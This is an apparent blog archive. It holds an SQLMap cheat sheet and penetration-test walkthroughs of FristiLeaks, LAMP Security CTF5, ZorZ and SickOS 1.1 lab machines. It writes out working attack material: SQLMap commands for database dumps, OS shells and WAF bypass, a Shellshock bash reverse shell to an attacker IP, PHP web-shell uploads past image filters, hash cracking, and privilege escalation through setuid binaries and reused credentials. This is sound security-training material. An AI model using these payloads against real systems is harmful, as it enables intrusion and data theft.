-bash-4.1$ ls -la
ls -la
total 16
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 05:53 .
drwxr-x---  3 fristigod fristigod 4096 Nov 25 05:55 ..
-rwsr-sr-x  1 root      root      7529 Nov 25 05:53 doCom
-bash-4.1$ ./d
./doCom
Nice try, but wrong user ;)

Privilege Escalation

Execution of the doCom binary was possible using the user fristi from the logged in user fristigod, successfully escalating privileges.

sudo -u fristi .secret_admin_stuff/doCom /bin/sh
sh-4.1# id
id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)

Root Flag

cat fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Flag: Y0u_kn0w_y0u_l0ve_fr1st1

Thanks for the VM :)

SQLMap Cheat Sheet: Flags & Commands for SQL Injection

Dhruv Ambaliya — Sun, 11 Feb 2024 14:37:10 +0000

What is SQLMap?

SQLMap is a SQL Injection automation tool that is finds and exploits SQL Injection vulnerabilities. SQLMap has a number of functionality that can assist from fingerprinting to fully compromising a database and/or in some cases gaining shell level access to a server. If you do not have a current understanding of the fundamentals of how a SQL injection vulnerability occurs or is exploited, see our documentation on what is SQL injection for an overview.

TIP: How To Use SQLMap

I personally use SQLMap as an exploitation tool, due to the large amount of resources and traffic the tool uses I personally find that detection is better done manually or using other detection tools such as Burp Suite scanner.

How to use SQLMap

SQLMap could be used within an automation system to detect and exploit SQL injection (SQLi) vulnerabilities in web applications, or as a SQLi exploitation tool to use after a proof of concept SQLi payload has been confirmed.

WARNING: SQLMap Usage

Depending on the configuration SQLMap can be very heavy on request sent to a web application, and may cause DoS conditions for webservers and cause an excessive amount of log files for the target.

The more information you can give SQLMap the faster and less requests the tool will make, for example if you know the backend DBMS is MySQL and it is vulnerable to time based injection, then this could be provided to SQLMap using --dbms=mysql and –technique=T.

How to Install SQLMap

Install SQLMap via github:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

How to Update SQLMap

How to update SQLMap:

python sqlmap.py --update

or cd into the github repo director and do:

git pull

What is SQLMap?
How to use SQLMap
How to Install SQLMap
How to Update SQLMap
SQLMap Commands
SQLMap Examples: How To…
Document Changelog

SQLMap Commands

SQLMap Options

Basic SQLMap command options:

COMMAND	DESCRIPTION
`-h, --help`	Show basic help message and exit
`-hh`	Show advanced help message and exit
`--version`	Show program's version number and exit
`-v VERBOSE`	Verbosity level: 0-6 (default 1)

SQLMap Target

SQLMap target command options:

COMMAND	DESCRIPTION
`-u URL, --url=URL`	Target URL (e.g. "http://www.site.com/vuln.php?id=1")
`-d DIRECT`	Connection string for direct database connection
`-l LOGFILE`	Parse target(s) from Burp or WebScarab proxy log file
`-m BULKFILE`	Scan multiple targets given in a textual file
`-r REQUESTFILE`	Load HTTP request from a file
`-g GOOGLEDORK`	Process Google dork results as target URLs
`-c CONFIGFILE`	Load options from a configuration INI file

SQLMap Requests

SQLMap request command options:

COMMAND	DESCRIPTION
`-A AGENT, --user..`	HTTP User-Agent header value
`-H HEADER, --hea..`	Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
`--method=METHOD`	Force usage of given HTTP method (e.g. PUT)
`--data=DATA`	Data string to be sent through POST (e.g. "id=1")
`--param-del=PARA..`	Character used for splitting parameter values (e.g. &)
`--cookie=COOKIE`	HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
`--cookie-del=COO..`	Character used for splitting cookie values (e.g. ;)
`--live-cookies=L..`	Live cookies file used for loading up-to-date values
`--load-cookies=L..`	File containing cookies in Netscape/wget format
`--drop-set-cookie`	Ignore Set-Cookie header from response
`--mobile`	Imitate smartphone through HTTP User-Agent header
`--random-agent`	Use randomly selected HTTP User-Agent header value
`--host=HOST`	HTTP Host header value
`--referer=REFERER`	HTTP Referer header value
`--headers=HEADERS`	Extra headers (e.g. "Accept-Language: fr\nETag: 123")
`--auth-type=AUTH..`	HTTP authentication type (Basic, Digest, NTLM or PKI)
`--auth-cred=AUTH..`	HTTP authentication credentials (name:password)
`--auth-file=AUTH..`	HTTP authentication PEM cert/private key file
`--ignore-code=IG..`	Ignore (problematic) HTTP error code (e.g. 401)
`--ignore-proxy`	Ignore system default proxy settings
`--ignore-redirects`	Ignore redirection attempts
`--ignore-timeouts`	Ignore connection timeouts
`--proxy=PROXY`	Use a proxy to connect to the target URL
`--proxy-cred=PRO..`	Proxy authentication credentials (name:password)
`--proxy-file=PRO..`	Load proxy list from a file
`--proxy-freq=PRO..`	Requests between change of proxy from a given list
`--tor`	Use Tor anonymity network
`--tor-port=TORPORT`	Set Tor proxy port other than default
`--tor-type=TORTYPE`	Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))
`--check-tor`	Check to see if Tor is used properly
`--delay=DELAY`	Delay in seconds between each HTTP request
`--timeout=TIMEOUT`	Seconds to wait before timeout connection (default 30)
`--retries=RETRIES`	Retries when the connection timeouts (default 3)
`--randomize=RPARAM`	Randomly change value for given parameter(s)
`--safe-url=SAFEURL`	URL address to visit frequently during testing
`--safe-post=SAFE..`	POST data to send to a safe URL
`--safe-req=SAFER..`	Load safe HTTP request from a file
`--safe-freq=SAFE..`	Regular requests between visits to a safe URL
`--skip-urlencode`	Skip URL encoding of payload data
`--csrf-token=CSR..`	Parameter used to hold anti-CSRF token
`--csrf-url=CSRFURL`	URL address to visit for extraction of anti-CSRF token
`--csrf-method=CS..`	HTTP method to use during anti-CSRF token page visit
`--csrf-retries=C..`	Retries for anti-CSRF token retrieval (default 0)
`--force-ssl`	Force usage of SSL/HTTPS
`--chunked`	Use HTTP chunked transfer encoded (POST) requests
`--hpp`	Use HTTP parameter pollution method
`--eval=EVALCODE`	Evaluate provided Python code before the request (e.g. "import hashlib;id2=hashlib.md5(id).hexdigest()")

SQLMap Optimisation

SQLMap optimisation command options:

COMMAND	DESCRIPTION
`-o`	Turn on all optimization switches
`--predict-output`	Predict common queries output
`--keep-alive`	Use persistent HTTP(s) connections
`--null-connection`	Retrieve page length without actual HTTP response body
`--threads=THREADS`	Max number of concurrent HTTP(s) requests (default 1)

SQLMap Injection

SQLMap injection command options:

COMMAND	DESCRIPTION
`-p TESTPARAMETER`	Testable parameter(s)
`--skip=SKIP`	Skip testing for given parameter(s)
`--skip-static`	Skip testing parameters that not appear to be dynamic
`--param-exclude=..`	Regexp to exclude parameters from testing (e.g. "ses")
`--param-filter=P..`	Select testable parameter(s) by place (e.g. "POST")
`--dbms=DBMS`	Force back-end DBMS to provided value
`--dbms-cred=DBMS..`	DBMS authentication credentials (user:password)
`--os=OS`	Force back-end DBMS operating system to provided value
`--invalid-bignum`	Use big numbers for invalidating values
`--invalid-logical`	Use logical operations for invalidating values
`--invalid-string`	Use random strings for invalidating values
`--no-cast`	Turn off payload casting mechanism
`--no-escape`	Turn off string escaping mechanism
`--prefix=PREFIX`	Injection payload prefix string
`--suffix=SUFFIX`	Injection payload suffix string
`--tamper=TAMPER`	Use given script(s) for tampering injection data

SQLMap Detection

SQLMap detection command options:

COMMAND	DESCRIPTION
`--level=LEVEL`	Level of tests to perform (1-5, default 1)
`--risk=RISK`	Risk of tests to perform (1-3, default 1)
`--string=STRING`	String to match when query is evaluated to True
`--not-string=NOT..`	String to match when query is evaluated to False
`--regexp=REGEXP`	Regexp to match when query is evaluated to True
`--code=CODE`	HTTP code to match when query is evaluated to True
`--smart`	Perform thorough tests only if positive heuristic(s)
`--text-only`	Compare pages based only on the textual content
`--titles`	Compare pages based only on their titles

SQLMap Techniques

SQLMap technique command options:

COMMAND	DESCRIPTION
`--technique=TECH..`	SQL injection techniques to use (default "BEUSTQ")
`--time-sec=TIMESEC`	Seconds to delay the DBMS response (default 5)
`--union-cols=UCOLS`	Range of columns to test for UNION query SQL injection
`--union-char=UCHAR`	Character to use for bruteforcing number of columns
`--union-from=UFROM`	Table to use in FROM part of UNION query SQL injection
`--dns-domain=DNS..`	Domain name used for DNS exfiltration attack
`--second-url=SEC..`	Resulting page URL searched for second-order response
`--second-req=SEC..`	Load second-order HTTP request from file

SQLMap Fingerprinting

SQLMap fingerprint command options:

COMMAND	DESCRIPTION
`-f, --fingerprint`	Perform an extensive DBMS version fingerprint

SQLMap Enumeration

SQLMap enumeration command options:

COMMAND	DESCRIPTION
`-a, --all`	Retrieve everything
`-b, --banner`	Retrieve DBMS banner
`--current-user`	Retrieve DBMS current user
`--current-db`	Retrieve DBMS current database
`--hostname`	Retrieve DBMS server hostname
`--is-dba`	Detect if the DBMS current user is DBA
`--users`	Enumerate DBMS users
`--passwords`	Enumerate DBMS users password hashes
`--privileges`	Enumerate DBMS users privileges
`--roles`	Enumerate DBMS users roles
`--dbs`	Enumerate DBMS databases
`--tables`	Enumerate DBMS database tables
`--columns`	Enumerate DBMS database table columns
`--schema`	Enumerate DBMS schema
`--count`	Retrieve number of entries for table(s)
`--dump`	Dump DBMS database table entries
`--dump-all`	Dump all DBMS databases tables entries
`--search`	Search column(s), table(s) and/or database name(s)
`--comments`	Check for DBMS comments during enumeration
`--statements`	Retrieve SQL statements being run on DBMS
`-D DB`	DBMS database to enumerate
`-T TBL`	DBMS database table(s) to enumerate
`-C COL`	DBMS database table column(s) to enumerate
`-X EXCLUDE`	DBMS database identifier(s) to not enumerate
`-U USER`	DBMS user to enumerate
`--exclude-sysdbs`	Exclude DBMS system databases when enumerating tables
`--pivot-column=P..`	Pivot column name
`--where=DUMPWHERE`	Use WHERE condition while table dumping
`--start=LIMITSTART`	First dump table entry to retrieve
`--stop=LIMITSTOP`	Last dump table entry to retrieve
`--first=FIRSTCHAR`	First query output word character to retrieve
`--last=LASTCHAR`	Last query output word character to retrieve
`--sql-query=SQLQ..`	SQL statement to be executed
`--sql-shell`	Prompt for an interactive SQL shell
`--sql-file=SQLFILE`	Execute SQL statements from given file(s)

SQLMap Brute Force

SQLMap brute force command options:

COMMAND	DESCRIPTION
`--common-tables`	Check existence of common tables
`--common-columns`	Check existence of common columns
`--common-files`	Check existence of common files

SQLMap Custom User Defined Options

SQLMap custom command options:

COMMAND	DESCRIPTION
`--udf-inject`	Inject custom user-defined functions
`--shared-lib=SHLIB`	Local path of the shared library

SQLMap File System Options

SQLMap file system command options, e.g., how to read a file from the command line using SQLMap:

COMMAND	DESCRIPTION
`--file-read=FILE..`	Read a file from the back-end DBMS file system
`--file-write=FILE..`	Write a local file on the back-end DBMS file system
`--file-dest=FILE..`	Back-end DBMS absolute filepath to write to

SQLMap Operating System Access

SQLMap OS command options, e.g., how to gain a shell via SQLMap:

COMMAND	DESCRIPTION
`--os-cmd=OSCMD`	Execute an operating system command
`--os-shell`	Prompt for an interactive operating system shell
`--os-pwn`	Prompt for an OOB shell, Meterpreter or VNC
`--os-smbrelay`	One click prompt for an OOB shell, Meterpreter or VNC
`--os-bof`	Stored procedure buffer overflow exploitation
`--priv-esc`	Database process user privilege escalation
`--msf-path=MSFPATH`	Local path where Metasploit Framework is installed
`--tmp-path=TMPPATH`	Remote absolute path of temporary files directory

SQLMap Windows Registry Access

COMMAND	DESCRIPTION
`--reg-read`	Read a Windows registry key value
`--reg-add`	Write a Windows registry key value data
`--reg-del`	Delete a Windows registry key value
`--reg-key=REGKEY`	Windows registry key
`--reg-value=REGVAL`	Windows registry key value
`--reg-data=REGDATA`	Windows registry key value data
`--reg-type=REGTYPE`	Windows registry key value type

General SQLMap Commands

SQLMap general command options:

COMMAND	DESCRIPTION
`-s SESSIONFILE`	Load session from a stored (.sqlite) file
`-t TRAFFICFILE`	Log all HTTP traffic into a textual file
`--answers=ANSWERS`	Set predefined answers (e.g. "quit=N,follow=N")
`--base64=BASE64PARAMS`	Parameter(s) containing Base64 encoded data
`--base64-safe`	Use URL and filename safe Base64 alphabet (RFC 4648)
`--batch`	Never ask for user input, use the default behavior
`--binary-fields=BINARYFIELDS`	Result fields having binary values (e.g. "digest")
`--check-internet`	Check Internet connection before assessing the target
`--cleanup`	Clean up the DBMS from sqlmap specific UDF and tables
`--crawl=CRAWLDEPTH`	Crawl the website starting from the target URL
`--crawl-exclude=CRAWLEXCLUDE`	Regexp to exclude pages from crawling (e.g. "logout")
`--csv-del=CSVDEL`	Delimiting character used in CSV output (default ",")
`--charset=CHARSET`	Blind SQL injection charset (e.g. "0123456789abcdef")
`--dump-format=DUMPFORMAT`	Format of dumped data (CSV (default), HTML or SQLITE)
`--encoding=ENCODING`	Character encoding used for data retrieval (e.g. GBK)
`--eta`	Display for each output the estimated time of arrival
`--flush-session`	Flush session files for current target
`--forms`	Parse and test forms on target URL
`--fresh-queries`	Ignore query results stored in session file
`--gpage=GOOGLEPAGE`	Use Google dork results from specified page number
`--har=HARFILE`	Log all HTTP traffic into a HAR file
`--hex`	Use hex conversion during data retrieval
`--output-dir=OUTPUTDIR`	Custom output directory path
`--parse-errors`	Parse and display DBMS error messages from responses
`--preprocess=PREPROCESS`	Use given script(s) for preprocessing (request)
`--postprocess=POSTPROCESS`	Use given script(s) for postprocessing (response)
`--repair`	Redump entries having unknown character marker (?)
`--save=SAVECONFIG`	Save options to a configuration INI file
`--scope=SCOPE`	Regexp for filtering targets
`--skip-heuristics`	Skip heuristic detection of SQLi/XSS vulnerabilities
`--skip-waf`	Skip heuristic detection of WAF/IPS protection
`--table-prefix=TABLEPREFIX`	Prefix used for temporary tables (default: "sqlmap")
`--test-filter=TESTFILTER`	Select tests by payloads and/or titles (e.g. ROW)
`--test-skip=TESTSKIP`	Skip tests by payloads and/or titles (e.g. BENCHMARK)
`--web-root=WEBROOT`	Web server document root directory (e.g. "/var/www")

Misc SQLMap Commands

SQLMap commands that don’t fit into any other category :)

COMMAND	DESCRIPTION
`-z MNEMONICS`	Use short mnemonics (e.g. "flu,bat,ban,tec=EU")
`--alert=ALERT`	Run host OS command(s) when SQL injection is found
`--beep`	Beep on question and/or when SQLi/XSS/FI is found
`--dependencies`	Check for missing (optional) sqlmap dependencies
`--disable-coloring`	Disable console output coloring
`--list-tampers`	Display list of available tamper scripts
`--offline`	Work in offline mode (only use session data)
`--purge`	Safely remove all content from sqlmap data directory
`--results-file=RESULTSFILE`	Location of CSV results file in multiple targets mode
`--shell`	Prompt for an interactive sqlmap shell
`--tmp-dir=TMPDIR`	Local directory for storing temporary files
`--unstable`	Adjust options for unstable connections
`--update`	Update sqlmap
`--wizard`	Simple wizard interface for beginner users

SQLMap Examples: How To…

Enumerate Databases

How to enumerate the databases tables using SQLMap:

sqlmap -u "https://hacksofdhruv.me" --dbs

Enumerate Tables

How to enumerate the database tables using SQLMap:

sqlmap -u "https://hacksofdhruv.me" -D "$database-name" --tables

SQLMap Dump DB Table

How to dump the contents of the table using SQLMap:

sqlmap -u "https://hacksofdhruv.me" -D "$database-name" -T "$table-name" --dump

SQLMap from Burp file

Save a Burp or Zap request file and mark the injection point(s) parameters with an asterisk (*), the good thing about this option is that it takes care of any authentication cookies for you. You can inject into any parameter in the request, e.g., headers, inside cookies, and using multiple methods (GET, PUT, POST, DELETE) etc.

sqlmap -r request.burp

Custom SQL Injection Payload: Pre and Post Input

In a scenario where you have identified a SQL injection manually or via another tool, you may need to suffix (have input entered before the SQL injection payload) or postfix (have input inserted after the injection payload), this can be accomplished using the following:

How to insert input before an injection payload:

sqlmap -u "https://hacksofdhruv.me" -dbs --suffix="blah"

How to insert input after an injection payload:

sqlmap -u "https://hacksofdhruv.me" -dbs --postfix="--+"

--cookie="PHPSESSID=$your-cookie"

SQLMap Shell

How to get an operating system command shell with SQLMap:

--os-shell

How to execute a command with SQLMap:

--os-cmd uname

Meterpreter Shell with SQLMap:

--os-pwn

SQLMap WAF Bypass

To bypass WAF’s with SQLMap you can use the premade tamper scripts with --tamper like in the following example:

sqlmap -u “https://hacksofdhruv.me/?espresso=*” --tamper="apostrophemask,apostrophenullencode,randomcase"

Tamper Scripts Send a LOT of Requests

Tamper scripts will resend the same request for each of the SQLMap WAF bypass scripts that you add.

List of SQLMap Tamper Scripts:

Tamper	Description
apostrophemask.py	Replaces apostrophe character with its UTF-8 full width counterpart
apostrophenullencode.py	Replaces apostrophe character with its illegal double unicode counterpart
appendnullbyte.py	Appends encoded NULL byte character at the end of payload
base64encode.py	Base64 all characters in a given payload
between.py	Replaces greater than operator (‘>’) with ‘NOT BETWEEN 0 AND #’
bluecoat.py	Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator
chardoubleencode.py	Double url-encodes all characters in a given payload (not processing already encoded)
commalesslimit.py	Replaces instances like ‘LIMIT M, N’ with ‘LIMIT N OFFSET M’
commalessmid.py	Replaces instances like ‘MID(A, B, C)’ with ‘MID(A FROM B FOR C)’
concat2concatws.py	Replaces instances like ‘CONCAT(A, B)’ with ‘CONCAT_WS(MID(CHAR(0), 0, 0), A, B)’
charencode.py	Url-encodes all characters in a given payload (not processing already encoded)
charunicodeencode.py	Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded)
equaltolike.py	Replaces all occurances of operator equal (‘=’) with operator ‘LIKE’
escapequotes.py	Slash escape quotes (‘ and “)
greatest.py	Replaces greater than operator (‘>’) with ‘GREATEST’ counterpart
halfversionedmorekeywords.py	Adds versioned MySQL comment before each keyword
ifnull2ifisnull.py	Replaces instances like ‘IFNULL(A, B)’ with ‘IF(ISNULL(A), B, A)’
modsecurityversioned.py	Embraces complete query with versioned comment
modsecurityzeroversioned.py	Embraces complete query with zero-versioned comment
multiplespaces.py	Adds multiple spaces around SQL keywords
nonrecursivereplacement.py	Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace(“SELECT”, “”)) filters
percentage.py	Adds a percentage sign (‘%’) infront of each character
overlongutf8.py	Converts all characters in a given payload (not processing already encoded)
randomcase.py	Replaces each keyword character with random case value
randomcomments.py	Add random comments to SQL keywords
securesphere.py	Appends special crafted string
sp_password.py	Appends ‘sp_password’ to the end of the payload for automatic obfuscation from DBMS logs
space2comment.py	Replaces space character (‘ ‘) with comments
space2dash.py	Replaces space character (‘ ‘) with a dash comment (‘–’) followed by a random string and a new line (‘\n’)
space2hash.py	Replaces space character (‘ ‘) with a pound character (‘#’) followed by a random string and a new line (‘\n’)
space2morehash.py	Replaces space character (‘ ‘) with a pound character (‘#’) followed by a random string and a new line (‘\n’)
space2mssqlblank.py	Replaces space character (‘ ‘) with a random blank character from a valid set of alternate characters
space2mssqlhash.py	Replaces space character (‘ ‘) with a pound character (‘#’) followed by a new line (‘\n’)
space2mysqlblank.py	Replaces space character (‘ ‘) with a random blank character from a valid set of alternate characters
space2mysqldash.py	Replaces space character (‘ ‘) with a dash comment (‘–’) followed by a new line (‘\n’)
space2plus.py	Replaces space character (‘ ‘) with plus (‘+’)
space2randomblank.py	Replaces space character (‘ ‘) with a random blank character from a valid set of alternate characters
symboliclogical.py	Replaces AND and OR logical operators with their symbolic counterparts (&& and	)
unionalltounion.py	Replaces UNION ALL SELECT with UNION SELECT
unmagicquotes.py	Replaces quote character (‘) with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)
uppercase.py	Replaces each keyword character with upper case value ‘INSERT’
varnish.py	Append a HTTP header ‘X-originating-IP’
versionedkeywords.py	Encloses each non-function keyword with versioned MySQL comment
versionedmorekeywords.py	Encloses each keyword with versioned MySQL comment
xforwardedfor.py	Append a fake HTTP header ‘X-Forwarded-For’

SQLMap Proxy

It is possible to proxy SQLMap traffic via an upstream proxy such as Burp Suite by passing the following syntax to the tool:

sqlmap --proxy=http://127.0.0.1:8080

Burp Proxy Performance Hit

In my experience using Burp Suite as a Proxy for this process results in a considerable slow down in performance.

sqlmap -u “https://hacksofdhruv.me/?espresso=*” --dns-domain=$your-collab-url

SQLMap GET Parameter

The following specifies the GET parameter “espresso” for injection:

sqlmap -u “https://hacksofdhruv.me/?espresso=*” -p espresso

SQLMap POST Parameter

The following specifies the POST parameter “espresso” for injection:

sqlmap -u “https://hacksofdhruv.me/?espresso=*” --data “espresso=*”

Run SQL Queries

You can run a SQL query using –sql-query for example:

sqlmap -u hacksofdhruv.me -D $database-name --sql-query="SELECT * FROM $table;"

URL Parameters in Friendly URL’s

Simply mark them with an asterisk(*), for example:

https://hacksofdhruv.me/foo/bar/parameter1*/value1

The above would set the injection point at parameter1.

SQLMap Crawl & Exploit

Useful for automation, however please be mindful of the overheads you are imposing on the target server:

python3 sqlmap.py --crawl=5 --threads=5 --risk=3 --level=5 --batch --answers="keep testing=Y,sitemap=Y,skip further tests=N" --crawl-exclude="logout" --forms --tamper=apostrophemask,apostrophenullencode,randomcase --dns-domain=$your-collab-url --random-agent -u https://hacksofdhruv.me

You will need to replace your collaborator payloads URL, and I highly recommend you setup your own collaborator server for this.

If you found this SQLMap cheat sheet useful, please share it below.

Document Changelog

Last Updated: 12/02/2024 (12th of February 2024)
Author: Dhruv Ambaliya
Notes: SQLMap cheat sheet created.

LAMP Security CTF5 - Walkthrough

Dhruv Ambaliya — Thu, 08 Feb 2024 12:00:59 +0000

Difficulty Rating:

Author Description
Enumeration
- Host Service Enumeration
- HTTP Enumeration
  - Forced Browsing
Web Application Enumeration
- Hash Disclosure
- Verified Hash Type
Hashcat md5 cracking
Web Application Exploitation
Linux Local Enumeration
Local Privilege Escalation

Author Description

The LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products.

Author: madirish2600

Download: VulnHub via @VulnHub

Enumeration

Host Service Enumeration

nmap -v -p 1-65535 -sV -O -sT 192.168.30.130

Dislcaimer: Multiple Entry Points

The LAMPSecurity series is not particularly challenging, for each VM in the series I've targeted the web application as the entry point.

Port	Service	Version Detection
`TCP: 22`	SSH	OpenSSH 4.7 (protocol 2.0)
`TCP: 25`	SMTP	Sendmail 8.14.1/8.14.1
`TCP: 80`	HTTPD	Apache httpd 2.2.6 ((Fedora))
`TCP: 110`	POP3	ipop3d 2006k.101
`TCP: 111`	rpcbind	N/A
`TCP: 138`	netbios-ssn	Samba smbd 3.X
`TCP: 143`	IMAP	University of Washington IMAP imapd
`TCP: 445`	netbios-ssn	Samba smbd 3.X (workgroup: MYGROUP)
`TCP:901`	HTTP	Samba SWAT administration server
`TCP:3306`	MySQL	MySQL 5.0.45
`TCP:36644`	RPC	RPC
`TCP:36644`	RPC	RPC

HTTP Enumeration

Inspection of the Web Application revealed the blog used a URL path of /~andy/, indicating it was serving an Apache home dir - username enumeration is possible. Further inspection of the web application indicated the use of GET requests /?page=contact,

Forced Browsing

Dirbuster revealed the directory /~andy/data/nanoadmin.php, indicating the site used NanoCMS (this was confirmed by viewing the page source code).

Web Application Enumeration

Viewing the web application disclosed the application used “NanoCMS”, this information was also previously discovered using Dirbuster. Research indicated a NanoCMS vulnerability existed that disclosed the applications password hashes. http://www.securityfocus.com/bid/34508/exploit

Hash Disclosure

Admin hases were successfully retrived using the discovered NanoCMS exploit:

Verified Hash Type

Hash Identifier was used to confirm the hash was md5.

Hashcat md5 cracking

Hashcat was used to crack the hash.

# hashcat -m 0 -a 0 ctf5-hash.txt /usr/share/wordlists/rockyou.txt

Discovered password: 9d2f75377ac0ab991d40c91fd27e52fd:shannon

Web Application Exploitation

Authentication was successful using the previously cracked hash credential. I new page was created containing php reverse shell code:

A netcat reverse handler was setup nc -n -v -l -p 443, the shell successfully connected back.

Linux Local Enumeration

Enumeration indicated /home/ directories were readable.

Grep’ing for the string password discovered the following:

sh-3.2$ grep -R -i password /home/*

Discovered the file:

/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:  <title>Root
password</title>
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:  <text
xml:space="preserve"><note-content version="0.1">Root password
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:Root password

The file contained the root credentials.

Username	Password
`root`	50$cent

Local Privilege Escalation

sh-3.2$ su -
standard in must be a tty
sh-3.2$ python -c 'import pty;pty.spawn("/bin/sh")'
bash-3.2$ su -
su -
Password: 50$cent

[root@localhost ~]# whoami
whoami
root
[root@localhost ~]# id
id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
context=system_u:system_r:httpd_t:s0

Thanks for the VM :)

Zorz Walkthrough

Dhruv Ambaliya — Thu, 01 Feb 2024 11:00:10 +0000

Difficulty Rating:

Author Description
Level 1
Level 2
- Burp Suite - PHP Shell Injection in an Image file
- Reverse Shell:
Level 3
Flag

Author Description

Welcome to the ZorZ VM Challenge

This machine will probably test your web app skills once again. There are 3 different pages that should be focused on (you will see!) If you solve one or all three pages, please send me an email and quick write up on how you solved each challenge. Your goal is to successfully upload a webshell or malicious file to the server. If you can execute system commands on this box, thats good enough!!! I hope you have fun!

Port Scanning

nmap -v -p 1-65535 -sV -O -sT 10.0.1.110

Service Enumeration

Port	Service	Version Detection
`TCP: 80`	HTTP	Apache httpd 2.4.7 ((Ubuntu))

HTTP Enumeration

Enumeration of port 80, discovered login.php:

Level 1

The web application has no filter protection, so uploading a PHP shell is possible.

PHP Shell Upload:

The location /uploads2 was previously disclosed by Dirbuster, /uploads1 was discovered manually (logical guess).

Reverse shell:

[root:~]# nc -n -v -l -p 443                               
listening on [any] 443 ...
connect to [10.0.1.110] from (UNKNOWN) [10.0.1.111] 33115
Linux zorz 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux
 16:21:31 up 1 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

Level 1 complete.

Level 2

The initial attempt to upload the previous shell failed with the error message:

Several attempts were then made to upload shells with various extensions such as shell.png.php , shell.php.png etc to bypass the web application filtering, all attempts to bypassed the filtering failed.

Burp Suite - PHP Shell Injection in an Image file

It was apparent the web application had a mechanism for image file validation, several attempts were made to inject the php shell code into the image file. The solution was to inject the code at the end of the image data.

The file extension also needed modifying to .php.jpg, this appeared to force the web server to process the file, likely due to poorly configured Apache MIME types.

Image uploaded successfully.

Execution of image from /uploads2

Reverse Shell:

[root:~]# nc -n -v -l -p 443
listening on [any] 443 ...
connect to [10.0.1.110] from (UNKNOWN) [10.0.1.111] 33118
Linux zorz 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux
 17:02:32 up 42 min,  0 users,  load average: 0.00, 0.01, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Level 2 complete.

Level 3

Level 3 was beaten simply by renaming the php reverse shell to php-reverse-shell.php.png, this was enough to bypass the filtering.

An alternative solution would of been to use burp to upload the file + change the content type.

Flag

$ cd l337saucel337
$ ls
SECRETFILE
$ cat SE
cat: SE: No such file or directory
$ cat SECRETFILE
Great job so far. This box has 3 uploaders.

The first 2 are pure php, the last one is php w/jquery.

To get credit for this challenge, please submit a write-up or instructions
on how you compromised the uploader or uploaders. If you solve 1, 2, or all
of the uploader challenges, feel free to shoot me an email and let me know!

Thanks for playing!
http://www.top-hat-sec.com
$

Level 3 complete.

Thanks for the VM :)

SickOS 1.1 - Walkthrough

Dhruv Ambaliya — Thu, 11 Jan 2024 11:00:10 +0000

Difficulty Rating:

Author Description
Host Enumeration
- Port Scanning
- Service Enumeration
Squid Enumeration
Nikto scan via Proxy
Shellshock Bash Reverse Shell
Local Enumeration
Local Privilege Escalation
- Root Flag

Author Description

This CTF gives a clear analogy how hacking strategies can be performed on a network to compromise it in a safe environment. This vm is very similar to labs I faced in OSCP. The objective being to compromise the network/machine and gain Administrative/root privileges on them.

Author: @D4rk36

Download: VulnHub

Host Enumeration

Port Scanning

nmap -v -p 1-65535 -sV -O -sT 192.168.30.138

Service Enumeration

Port	Service	Version Detection
`TCP: 22`	SSH	OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
`TCP: 3128`	HTTP-Proxy	Squid http proxy 3.1.19

Squid Enumeration

Inspection of Squid using the metasploit module auxiliary/scanner/http/squid_pivot_scanning discovered port 80 was exposed via the proxy.

Nikto scan via Proxy

Nikto was configured to use the discovered Squid proxy:

[root:~]# nikto -h 192.168.221.138 -useproxy http://192.168.221.138:3128

Nikto disclosed the location /cgi-bin/status, indicating the target could be vulnerable to shellshock.

Shellshock Bash Reverse Shell

Burp Suite was used to manipulate User-Agent: to include the bash reverse shell.

() { ignored;};/bin/bash -i >& /dev/tcp/192.168.221.139/443 0>&1

A reverse shell was established:

[root:~]# nc.traditional -lp 443 -vvv
listening on [any] 443 ...

192.168.221.138: inverse host lookup failed: Unknown host
connect to [192.168.221.139] from (UNKNOWN) [192.168.221.138] 59815
bash: no job control in this shell
www-data@SickOs:/usr/lib/cgi-bin$

Local Enumeration

Local enumeration of the system disclosed the file /var/www/wolfcms/config.php containing:

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');

Local Privilege Escalation

The previously discovered credentials worked for MySQL root, and were reused for the user sickos and again for sudo as the user sickos.

Local Privilege Escalation:

www-data@SickOs:/$ su - sickos
su - sickos
Password: john@123

sickos@SickOs:~$ ls
ls
sickos@SickOs:~$ cat .bash_history
cat .bash_history
sudo su
exit
sickos@SickOs:~$ sudo -s
sudo -s
[sudo] password for sickos: john@123

root@SickOs:~# cd /root  
cd /root
root@SickOs:/root# ls
ls
a0216ea4d51874464078c618298b1367.txt
root@SickOs:/root# cat a0216ea4d51874464078c618298b1367.txt
